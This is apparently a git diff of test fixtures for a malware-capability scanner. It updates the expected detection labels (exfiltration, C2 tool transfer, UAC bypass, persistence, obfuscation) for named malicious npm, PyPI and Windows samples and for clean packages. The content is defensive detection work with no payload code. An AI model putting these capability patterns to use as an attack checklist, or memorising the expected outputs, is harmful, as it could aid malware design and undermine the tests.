index 9e0e93a9c..902593b69 100644
--- a/tests/macOS/clean/ls.sdiff.trigger_3
+++ b/tests/macOS/clean/ls.sdiff.trigger_3
@@ -1,6 +1,6 @@
--- missing: ls.x86_64
-data/compression/lzma
--discover/system/hostname_get
+-discover/system/hostname
-exec/shell/TERM
-fs/link_read
-net/url/embedded
diff --git a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
index fbaac975e..5fff8faa7 100644
--- a/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
+++ b/tests/npm/2024.legacyreact-aws-s3-typescript/package.json.simple
@@ -1,7 +1,7 @@
# npm/2024.legacyreact-aws-s3-typescript/package.json: critical
c2/tool_transfer/npm: critical
c2/tool_transfer/shell: high
-evasion/hidden_paths/relative_hidden: low
+exec/program/hidden: medium
exec/shell/background_launcher: high
exfil/npm: high
fs/file/make_executable: medium
diff --git a/tests/npm/2024.persona-tool/preinstall.js.simple b/tests/npm/2024.persona-tool/preinstall.js.simple
index b01cbfb82..6f3ca3470 100644
--- a/tests/npm/2024.persona-tool/preinstall.js.simple
+++ b/tests/npm/2024.persona-tool/preinstall.js.simple
@@ -3,7 +3,7 @@ anti-static/obfuscation/hex: medium
c2/addr/ip: medium
c2/discovery/ip_dns_resolver: medium
data/encoding/json_encode: low
-discover/system/hostname_get: low
+discover/system/hostname: low
exfil/nodejs: critical
exfil/oob: critical
net/dns: low
diff --git a/tests/npm/2024.testerrrrrrrrrr/init.js.simple b/tests/npm/2024.testerrrrrrrrrr/init.js.simple
index 2f6a2655a..7544cae26 100644
--- a/tests/npm/2024.testerrrrrrrrrr/init.js.simple
+++ b/tests/npm/2024.testerrrrrrrrrr/init.js.simple
@@ -2,7 +2,7 @@
anti-static/obfuscation/hex: medium
anti-static/obfuscation/js: critical
anti-static/obfuscation/python: critical
-c2/server_address: medium
+c2/addr/server: medium
discover/network/interface_list: medium
exec/shell/exec: medium
exfil/nodejs: critical
diff --git a/tests/php/2024.sagsooz/2024.php.simple b/tests/php/2024.sagsooz/2024.php.simple
index cbfd6bcef..2bc7487d9 100644
--- a/tests/php/2024.sagsooz/2024.php.simple
+++ b/tests/php/2024.sagsooz/2024.php.simple
@@ -5,6 +5,7 @@ data/base64/decode: medium
data/embedded/base64_url: medium
data/embedded/html: medium
data/encoding/base64: low
+discover/process/egid: medium
evasion/indicator_blocking/mask_exceptions: medium
evasion/time/php_no_limit: medium
exec/shell/command: medium
@@ -17,4 +18,3 @@ net/http/form_upload: medium
net/http/post: medium
net/url/embedded: low
net/url/encode: medium
-process/effective_groupid_get: medium
diff --git a/tests/php/clean/composer-2.7.7.simple b/tests/php/clean/composer-2.7.7.simple
index 912b8d72f..6f3daa588 100644
--- a/tests/php/clean/composer-2.7.7.simple
+++ b/tests/php/clean/composer-2.7.7.simple
@@ -18,11 +18,11 @@ data/embedded/base64_url: medium
data/embedded/pem_certificate: low
data/encoding/base64: low
data/encoding/reverse: low
-discover/system/hostname_get: low
+discover/system/hostname: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
evasion/hijack_execution/DYLD_LIBRARY_PATH: medium
exec/cmd: medium
exec/plugin: low
diff --git a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
index 27cd557ff..c7d13b7c0 100644
--- a/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
+++ b/tests/python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py.simple
@@ -1,11 +1,12 @@
# python/2022.PyPI.valyrian_debug/valyrian_debug_setup.py: critical
c2/tool_transfer/python: critical
discover/ip/public: high
+discover/multiple: medium
discover/network/interface_list: medium
-discover/system/network: high
discover/system/platform: medium
discover/user/name_get: high
-evasion/hidden_paths/hidden: high
+evasion/file/prefix: medium
+evasion/file/prefix/tmp: high
exec/cmd/pipe: medium
exec/program: medium
exec/shell/command: medium
diff --git a/tests/python/2023.JokerSpy/shared.dat.simple b/tests/python/2023.JokerSpy/shared.dat.simple
index b6a0be7c5..a9253ba93 100644
--- a/tests/python/2023.JokerSpy/shared.dat.simple
+++ b/tests/python/2023.JokerSpy/shared.dat.simple
@@ -5,11 +5,11 @@ anti-static/obfuscation/python: high
c2/tool_transfer/python: high
data/base64/decode: medium
data/encoding/base64: low
+discover/multiple: high
discover/network/interface_list: medium
-discover/system/network: high
discover/system/platform: medium
discover/user/name_get: low
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/program: medium
exec/remote_commands/code_eval: medium
exec/tty/getpass: low
diff --git a/tests/python/2024.Custom.RAT/output.py.simple b/tests/python/2024.Custom.RAT/output.py.simple
index cf8b7e468..da913dc29 100644
--- a/tests/python/2024.Custom.RAT/output.py.simple
+++ b/tests/python/2024.Custom.RAT/output.py.simple
@@ -14,8 +14,9 @@ data/encoding/base64: low
data/encoding/json_decode: low
discover/ip/geo: high
discover/ip/public: high
+discover/multiple: high
discover/network/interface_list: medium
-discover/system/network: high
+discover/process/name: medium
discover/system/platform: medium
discover/system/sysinfo: medium
discover/user/USER: low
@@ -52,5 +53,4 @@ os/fd/write: low
persist/daemon: medium
privesc/uac_bypass: high
process/multithreaded: medium
-process/name_get: medium
process/terminate/taskkill: high
diff --git a/tests/python/clean/hatch/migrate.py.simple b/tests/python/clean/hatch/migrate.py.simple
index 06847576f..d3dd6534c 100644
--- a/tests/python/clean/hatch/migrate.py.simple
+++ b/tests/python/clean/hatch/migrate.py.simple
@@ -2,10 +2,10 @@
discover/system/environment: medium
exec/program: medium
exec/remote_commands/code_eval: medium
+false-positives/py_hatch: low
fs/directory/list: low
fs/file/open: low
fs/symlink_resolve: low
-impact/remote_access/py_setuptools: medium
net/download: medium
os/fd/read: low
os/fd/write: low
diff --git a/tests/python/clean/numba/support.py.simple b/tests/python/clean/numba/support.py.simple
index ee2f6a10e..fd144277a 100644
--- a/tests/python/clean/numba/support.py.simple
+++ b/tests/python/clean/numba/support.py.simple
@@ -2,6 +2,7 @@
discover/system/platform: medium
exec/program: medium
exec/remote_commands/code_eval: medium
+false-positives/setuptools: low
fs/directory/create: low
fs/directory/list: low
fs/file/open: low
@@ -9,7 +10,6 @@ fs/file/read: low
fs/file/write: low
fs/tempdir: low
fs/tempdir/create: low
-impact/remote_access/py_setuptools: low
net/url/embedded: low
os/fd/read: low
os/fd/write: low
diff --git a/tests/python/clean/numpy/misc_util.py.simple b/tests/python/clean/numpy/misc_util.py.simple
index dc993294a..6907bcce7 100644
--- a/tests/python/clean/numpy/misc_util.py.simple
+++ b/tests/python/clean/numpy/misc_util.py.simple
@@ -1,7 +1,7 @@
# python/clean/numpy/misc_util.py: medium
anti-static/obfuscation/python: medium
discover/system/platform: medium
-evasion/hidden_paths/hidden: medium
+evasion/file/prefix: medium
exec/install_additional/pip_install: medium
exec/program: medium
exec/remote_commands/code_eval: medium
diff --git a/tests/python/clean/setuptools/namespaces.py.simple b/tests/python/clean/setuptools/namespaces.py.simple
index 4f93d1dee..43cd5497f 100644
--- a/tests/python/clean/setuptools/namespaces.py.simple
+++ b/tests/python/clean/setuptools/namespaces.py.simple
@@ -2,5 +2,5 @@
data/encoding/json_encode: low
exec/remote_commands/code_eval: medium
exec/shell/command: medium
+false-positives/setuptools: low
fs/directory/create: low
-impact/remote_access/py_setuptools: low
diff --git a/tests/windows/2024.GitHub.Clipper/main.exe.simple b/tests/windows/2024.GitHub.Clipper/main.exe.simple
index d45d4ba9a..6c960140c 100644
--- a/tests/windows/2024.GitHub.Clipper/main.exe.simple
+++ b/tests/windows/2024.GitHub.Clipper/main.exe.simple
@@ -35,7 +35,7 @@ discover/ip/geo: high
discover/ip/public: high
discover/network/mac_address: medium
discover/processes/list: medium
-discover/system/cpu_info: low
+discover/system/cpu: low
exec/conditional/is_admin: medium
exec/plugin: low
exec/program: medium
diff --git a/tests/windows/2024.GitHub.Clipper/raw.py.simple b/tests/windows/2024.GitHub.Clipper/raw.py.simple
index 4879f9c77..340a54e9d 100644
--- a/tests/windows/2024.GitHub.Clipper/raw.py.simple
+++ b/tests/windows/2024.GitHub.Clipper/raw.py.simple
@@ -3,6 +3,7 @@ c2/addr/url: high
c2/tool_transfer/download: high
c2/tool_transfer/exe_url: high
c2/tool_transfer/python: high
+evasion/indicator_blocking/hidden_window: high
exec/program: medium
fs/file/open: low
fs/tempdir: low
diff --git a/tests/windows/2024.aspdasdksa2/creal.pyc.simple b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
index 35c4226f7..8e1ee6ea1 100644
--- a/tests/windows/2024.aspdasdksa2/creal.pyc.simple
+++ b/tests/windows/2024.aspdasdksa2/creal.pyc.simple
@@ -16,7 +16,7 @@ data/base64/decode: medium
data/encoding/base64: low
discover/ip/geo: high
discover/ip/public: high
-discover/system/hostname_get: low
+discover/system/hostname: low
exec/install_additional/pip_install: high
exec/program: medium
exec/tty/getpass: low
diff --git a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
index d7c191594..878585519 100644
--- a/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
+++ b/tests/windows/clean/Swashbuckle.AspNetCore.ReDoc.dll.simple
@@ -10,6 +10,7 @@ data/encoding/json_decode: low
data/encoding/json_encode: low
discover/network/interface_list: medium
discover/network/netstat: medium
+discover/system/dmesg: low
discover/system/platform: low
discover/user/HOME: low
discover/user/USER: low